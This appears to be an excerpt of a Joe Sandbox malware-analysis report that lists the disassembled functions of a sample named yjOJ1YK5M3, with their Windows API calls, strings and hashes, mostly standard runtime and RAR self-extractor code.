                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: __alldvrm$_strrchr
                                        • String ID:
                                        • API String ID: 1036877536-0
                                        • Opcode ID: 1ec6666d94b4212580304211626675eb5ed9854efa503107affec4ce99a0ac8c
                                        • Instruction ID: f879e9fd6a474630c1c6f78ddcf1301a6910e1a85b8911796538ac3d58448d12
                                        • Opcode Fuzzy Hash: 1ec6666d94b4212580304211626675eb5ed9854efa503107affec4ce99a0ac8c
                                        • Instruction Fuzzy Hash: 7CA14971E207879FEB11CF28C8D17AEBBE4EF57350F144169E5859B282CA788D51CB90
                                        Function 002A3638 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,002A0481,?,00000000,?,00000001,?,?,00000001,002A0481,?), ref: 002A3685
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 002A370E
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0029DBD1,?), ref: 002A3720
                                        • __freea.LIBCMT ref: 002A3729
                                          • Part of subcall function 002A040E: RtlAllocateHeap.NTDLL(00000000,0029535E,?,?,00296C16,?,?,?,?,?,00295269,0029535E,?,?,?,?), ref: 002A0440
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                        • String ID:
                                        • API String ID: 2652629310-0
                                        • Opcode ID: 7e46c24878a9d93a2aae51f673c1f6b1e4b71e88443c973e6df44efc94f7dab5
                                        • Instruction ID: f0f37b15eaadde86728f9e653958311b86562ae6b856e630f4da1a44336a1a3b
                                        • Opcode Fuzzy Hash: 7e46c24878a9d93a2aae51f673c1f6b1e4b71e88443c973e6df44efc94f7dab5
                                        • Instruction Fuzzy Hash: 5C31A0B1A2020AABDF25DF64DC85DAEBBE9EB45750F140169FC04D6250EB35CE60CB90
                                        Function 0028126C Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 00281273
                                          • Part of subcall function 0028067E: GetVersionExW.KERNEL32(?), ref: 002806AF
                                        • FoldStringW.KERNEL32(00000020,?,000000FF,00000000,00000000,0000000C,0027350C,D946ACBC,00000000,?,?,002743F5,?,?,?,00000000), ref: 0028129A
                                        • FoldStringW.KERNEL32(00000020,?,000000FF,?,?,00000000), ref: 002812D4
                                        • _wcslen.LIBCMT ref: 002812DF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: FoldString$H_prolog3Version_wcslen
                                        • String ID:
                                        • API String ID: 535866816-0
                                        • Opcode ID: ea20e61e7b3a7a57264a3f68e5e5f36328efba13b53ade9c73327ac57649de58
                                        • Instruction ID: bcfc0ca59766f9bb0367e87ecac8957b616c0d5466a3dc0878c5d2ab34bc4000
                                        • Opcode Fuzzy Hash: ea20e61e7b3a7a57264a3f68e5e5f36328efba13b53ade9c73327ac57649de58
                                        • Instruction Fuzzy Hash: E2119471A22126ABDB01AFA98D49A6F7B6DAF05720F200205B810E72C1CB309971CBF1
                                        Function 002862CD Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 002862D4
                                        • ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000010), ref: 002862EB
                                        • ExpandEnvironmentStringsW.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000010), ref: 00286328
                                        • _wcslen.LIBCMT ref: 00286338
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: EnvironmentExpandStrings$H_prolog3_wcslen
                                        • String ID:
                                        • API String ID: 3741103063-0
                                        • Opcode ID: be43d1155240f42b5fdbd03c46020c6a1d59a2fb09f1e928b987beca49423af3
                                        • Instruction ID: ebdbcbae695ba8a62c1f024c54a611a675ee0125ca017928d6dc77ac64701013
                                        • Opcode Fuzzy Hash: be43d1155240f42b5fdbd03c46020c6a1d59a2fb09f1e928b987beca49423af3
                                        • Instruction Fuzzy Hash: 6811A074A2221AAF9F00AFA89D899BFF779BF45714714415DB411A7280DB34AE20CBA4
                                        Function 002A19E4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,002A198B,00000000,00000000,00000000,00000000,?,002A1B88,00000006,FlsSetValue), ref: 002A1A16
                                        • GetLastError.KERNEL32(?,002A198B,00000000,00000000,00000000,00000000,?,002A1B88,00000006,FlsSetValue,002B0DD0,FlsSetValue,00000000,00000364,?,002A00D7), ref: 002A1A22
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,002A198B,00000000,00000000,00000000,00000000,?,002A1B88,00000006,FlsSetValue,002B0DD0,FlsSetValue,00000000), ref: 002A1A30
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        • Opcode ID: 8167a16c6576258445c03afbb4d45a8ddef4842318f77f090e52aafd5443e7dd
                                        • Instruction ID: ce2990beaf76a0993d09753b8b4e886e909df0810eeeec5ffea43342d0b7e83c
                                        • Opcode Fuzzy Hash: 8167a16c6576258445c03afbb4d45a8ddef4842318f77f090e52aafd5443e7dd
                                        • Instruction Fuzzy Hash: AA01F7366662239BC7218EA8AC48A57779CAF077B1F254620FD0AD3242CF20D830C6E0
                                        Function 00281309 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 00281310
                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,002817FB,?,?,\\?\,D946AC94,?,?,?,00000000,002AA279,000000FF), ref: 00281319
                                        • GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,?,00000000,002AA279,000000FF), ref: 00281348
                                        • _wcslen.LIBCMT ref: 00281351
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory$H_prolog3_wcslen
                                        • String ID:
                                        • API String ID: 19219720-0
                                        • Opcode ID: 05ca42ff9b440ebe14d8e76cde77f6a44022fc956b293405aa374dba201e56b8
                                        • Instruction ID: 1ea53ceddc621a09d8798e65299c06e179e34920535aa696cb88ed48a3da1d74
                                        • Opcode Fuzzy Hash: 05ca42ff9b440ebe14d8e76cde77f6a44022fc956b293405aa374dba201e56b8
                                        • Instruction Fuzzy Hash: 9A01DB75D20126BB8B10AFF89D058BFBB7DAF86710B104609F515E7281CF348921CBE0
                                        Function 0028EB74 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDC.USER32(00000000), ref: 0028EB77
                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0028EB86
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0028EB94
                                        • ReleaseDC.USER32(00000000,00000000), ref: 0028EBA2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: CapsDevice$Release
                                        • String ID:
                                        • API String ID: 1035833867-0
                                        • Opcode ID: 8350f8df71bdf71e04ebe2c7ed726d60cee94c7ec0fb675a2d6780174e9a8d44
                                        • Instruction ID: a42e29e95c674e2ea4e470583def374be1cd4433272617051e2c795131c80f72
                                        • Opcode Fuzzy Hash: 8350f8df71bdf71e04ebe2c7ed726d60cee94c7ec0fb675a2d6780174e9a8d44
                                        • Instruction Fuzzy Hash: A7E0123194AF70ABD7211B71BD0DF873E54AF19B53F050181FB05AA1D0CAB084408FD0
                                        Function 00287C68 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 293COMMON
                                        Download Yara Rule
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 00288294
                                          • Part of subcall function 002714A7: _wcslen.LIBCMT ref: 002714B8
                                          • Part of subcall function 0029087E: __EH_prolog3_GS.LIBCMT ref: 00290885
                                          • Part of subcall function 0029087E: GetLastError.KERNEL32(0000001C,00288244,?,00000000,00000086,?,D946AC94,?,?,?,?,?,00000000,002AA75D,000000FF), ref: 0029089D
                                          • Part of subcall function 0029087E: SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,002AA75D,000000FF), ref: 002908D6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ErrorLast$H_prolog3_Init_thread_footer_wcslen
                                        • String ID: %ls
                                        • API String ID: 1279724102-3246610740
                                        • Opcode ID: 3132d95d8145615e89fa90c8711a5ca7bb59f9440af6f5263d7d75672cba28b7
                                        • Instruction ID: 5f111fc64bfade45bbac1b801c1c612a5edde86e3743fe6b18f0ef7f12e8966a
                                        • Opcode Fuzzy Hash: 3132d95d8145615e89fa90c8711a5ca7bb59f9440af6f5263d7d75672cba28b7
                                        • Instruction Fuzzy Hash: 28B19F34825209EBDB24FF54CD56EAE7BB5BF15304F208419F846261E1DBB1AA74EF80
                                        Function 002A28A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 002A246B: GetOEMCP.KERNEL32(00000000,?,?,002A26F4,?), ref: 002A2496
                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,002A2739,?,00000000), ref: 002A2914
                                        • GetCPInfo.KERNEL32(00000000,9'*,?,?,?,002A2739,?,00000000), ref: 002A2927
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: CodeInfoPageValid
                                        • String ID: 9'*
                                        • API String ID: 546120528-3582295230
                                        • Opcode ID: 6077cd9c64cafb54c737221056a0b0188009a07d195c3377ffb59000122c051f
                                        • Instruction ID: e198f761580667a4354117987af403d9a251463ab66c180574954177f9ae0c88
                                        • Opcode Fuzzy Hash: 6077cd9c64cafb54c737221056a0b0188009a07d195c3377ffb59000122c051f
                                        • Instruction Fuzzy Hash: C5512570A20343DFDB25CF39C8416BBFBE5EF42700F24406ED09687252DA35999ACB90
                                        Function 002A2543 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 002A2568
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Info
                                        • String ID: $}**
                                        • API String ID: 1807457897-3226082957
                                        • Opcode ID: c851cd05edc7bf4b50b93ce8bc53647e69e39fd3f298d3ec974a46e38c8fa4e7
                                        • Instruction ID: f8384498bb5d11b7c115207f2a2164163438c494ce469455d569ffa874c67ed4
                                        • Opcode Fuzzy Hash: c851cd05edc7bf4b50b93ce8bc53647e69e39fd3f298d3ec974a46e38c8fa4e7
                                        • Instruction Fuzzy Hash: 2F413B70915248DFDF268E28CC84BF6BBEDEB46704F1404ECE58A86142D6359A69CF60
                                        Function 0027F103 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 002879F7: GetSystemTime.KERNEL32(?,00000000), ref: 00287A0F
                                          • Part of subcall function 002879F7: SystemTimeToFileTime.KERNEL32(?,?), ref: 00287A1D
                                          • Part of subcall function 002879A0: __aulldiv.LIBCMT ref: 002879A9
                                        • __aulldiv.LIBCMT ref: 0027F162
                                        • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,D946AC94,?,?,00000000,?,00000000,002A9F3D,000000FF), ref: 0027F169
                                          • Part of subcall function 00271150: _wcslen.LIBCMT ref: 0027115B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Time$System__aulldiv$CurrentFileProcess_wcslen
                                        • String ID: .rartemp
                                        • API String ID: 3789791499-2558811017
                                        • Opcode ID: 102b6688540c45ba751a596345df6cb1c83b40f2e3a93a06b7f6aa3ab1086800
                                        • Instruction ID: ee1f83fc3b31ead917be12e7bc7f3a3b54aab6694229daf106d0dc9dc71b30e8
                                        • Opcode Fuzzy Hash: 102b6688540c45ba751a596345df6cb1c83b40f2e3a93a06b7f6aa3ab1086800
                                        • Instruction Fuzzy Hash: B2418371920249ABDF14EF64CC45EEEB7B8EF54310F508169F91993282EB349B68CF60
                                        Function 0028DACE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 118COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 0028DAD5
                                          • Part of subcall function 00280360: __EH_prolog3.LIBCMT ref: 00280367
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID: Shell.Explorer$about:blank
                                        • API String ID: 431132790-874089819
                                        • Opcode ID: 689fee82622843cd6b434b9f823e688f5bf7fbb93d7d6135a1f6b29a49a372a4
                                        • Instruction ID: cec248d37ca8f9bfa044ca5a85a118f7d0feb1de00a4bc692f5be0a8a88591ef
                                        • Opcode Fuzzy Hash: 689fee82622843cd6b434b9f823e688f5bf7fbb93d7d6135a1f6b29a49a372a4
                                        • Instruction Fuzzy Hash: 08417E786212028FDF48EFA4D895B6A77B1BF89704F15806DE8069B2D2DF70AD14CF50
                                        Function 0028D7EB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0028D7F2
                                        • ShowWindow.USER32(?,00000005), ref: 0028D8E8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3_ShowWindow
                                        • String ID: qI)
                                        • API String ID: 4203566401-3380328277
                                        • Opcode ID: f1a82f4a5c693c4f08198405dbb3c7055b29cf63feab24938cc95ae323e9f2ce
                                        • Instruction ID: f59db453b2d169e650ba7ece24bf6295329c5aefefae96c3ba0a18c471902cd0
                                        • Opcode Fuzzy Hash: f1a82f4a5c693c4f08198405dbb3c7055b29cf63feab24938cc95ae323e9f2ce
                                        • Instruction Fuzzy Hash: FC414F35A21629AFDB05EFA4DC88E9DBBB5FF0D310B044018F905A72A0DB71AD25CF90
                                        Function 00290110 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00271E44: GetDlgItem.USER32(00000000,00003021), ref: 00271E88
                                          • Part of subcall function 00271E44: SetWindowTextW.USER32(00000000,002AC6C8), ref: 00271E9E
                                        • EndDialog.USER32(?,00000001), ref: 0029017B
                                        • SetDlgItemTextW.USER32(?,00000067,?), ref: 002901B9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ItemText$DialogWindow
                                        • String ID: GETPASSWORD1
                                        • API String ID: 445417207-3292211884
                                        • Opcode ID: fe655c0e678b7c8270d9c6b9fc92df68faf00ade9c5025210a39927561cf51e8
                                        • Instruction ID: 7d7a8be80a02ba412ca0f9de26f3cda32c4db7094f7199ba15dba7809704b2cf
                                        • Opcode Fuzzy Hash: fe655c0e678b7c8270d9c6b9fc92df68faf00ade9c5025210a39927561cf51e8
                                        • Instruction Fuzzy Hash: E21108B26643197FDA209F289C89FFB77ACEB85700F000429F74DA3180C770A8518B76
                                        Function 00285109 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00285094: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 002850B3
                                          • Part of subcall function 00285094: GetProcAddress.KERNEL32(002C51F8,CryptUnprotectMemory), ref: 002850C3
                                        • GetCurrentProcessId.KERNEL32(?,00000200,?,00285104), ref: 00285197
                                        Strings
                                        • CryptUnprotectMemory failed, xrefs: 0028518F
                                        • CryptProtectMemory failed, xrefs: 0028514E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AddressProc$CurrentProcess
                                        • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                        • API String ID: 2190909847-396321323
                                        • Opcode ID: cade798766e128f647dcfabf83e75b7bfbfda83c437b2537b91e3359f62deb49
                                        • Instruction ID: cb778de9da51d875ccbdd5a8c9536f29d8b55b27e1329be077cbec0e15b7256e
                                        • Opcode Fuzzy Hash: cade798766e128f647dcfabf83e75b7bfbfda83c437b2537b91e3359f62deb49
                                        • Instruction Fuzzy Hash: D5110335A22E35ABDB11BF24EC08B6E3B69AF41760B108115FC095B2C1DB70AD618BD5
                                        Function 0028FEA7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00020008,?), ref: 0028FEB6
                                        • GetLastError.KERNEL32 ref: 0028FEE1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: CurrentErrorLastProcess
                                        • String ID: $L)
                                        • API String ID: 335030130-3732647755
                                        • Opcode ID: 694ad49962ea7077518beb83564596132c44e08b988726e20a322b0c870068b9
                                        • Instruction ID: 7cee594843a5bbcb202ddf389c3fb7b5f3cd20d0b8d52f1fd7e80e6468f5bbed
                                        • Opcode Fuzzy Hash: 694ad49962ea7077518beb83564596132c44e08b988726e20a322b0c870068b9
